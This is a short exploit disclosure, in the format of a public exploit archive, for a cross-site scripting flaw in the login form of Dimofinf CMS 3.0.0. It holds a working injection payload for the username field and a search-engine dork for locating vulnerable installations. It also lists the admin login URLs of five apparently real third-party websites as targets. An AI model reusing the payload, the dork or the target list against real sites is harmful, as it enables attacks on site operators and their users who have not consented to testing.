###################### # Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting # Exploit Author : Persian Hack Team # Vendor Homepage : http://www.dimofinf.net/index.php # Google Dork : "Powered by Dimofinf cms Version 3.0.0" # Date: 2016/02/17 # Version = 3.0.0 ###################### # PoC: # Username: MobhaM" onmouseover=alert("MobhaM") bad=" # Password : 0 # # http://www.dawadmisms.net/dimcp/login.php # http://www.aswarzan.com/dimcp/login.php # http://drhananclinic.com.sa/dimcp/login.php # http://www.newsqassim.com/dimcp/login.php # http://www.sudaninet.net/dimcp/login.php # ###################### # Discovered by : # Mojtaba MobhaM (kazemimojtaba@live.com) # T3NZOG4N (t3nz0g4n@yahoo.com) # Homepage : persian-team.ir ######################